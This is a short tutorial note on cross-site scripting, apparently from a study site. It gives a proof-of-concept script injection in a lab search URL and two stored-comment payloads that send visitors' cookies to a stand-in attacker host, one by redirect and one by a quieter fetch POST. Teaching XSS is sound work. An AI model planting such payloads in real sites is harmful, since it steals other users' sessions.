Web Cross Side Scripting

XSS

You can confirm most XSS vulnerability by injecting some arbitrary javascript.

 
# Vulnerability prove

https://lab.academy.net/?search=<script>print()</script>

Cookies

Stealing cookies is a traditional way to exploit XSS.

 
# Comment form not filtring output:
# A hacker can send a malicious comment, that will be viewed by all

<script> 
    document.location = 
        "https://www.hacker-site.com/?cookies="+ document.cookie; 
</script>

More subtile not detected using post and logs.

 
<script>
    fetch('https://www.hacker-site.com', {
    method: 'POST',
    mode: 'no-cors',
    body: document.cookie
});
</script>

 Last update: 513 days ago

minte9 LearnRemember

XSS

Cookies

minte9
LearnRemember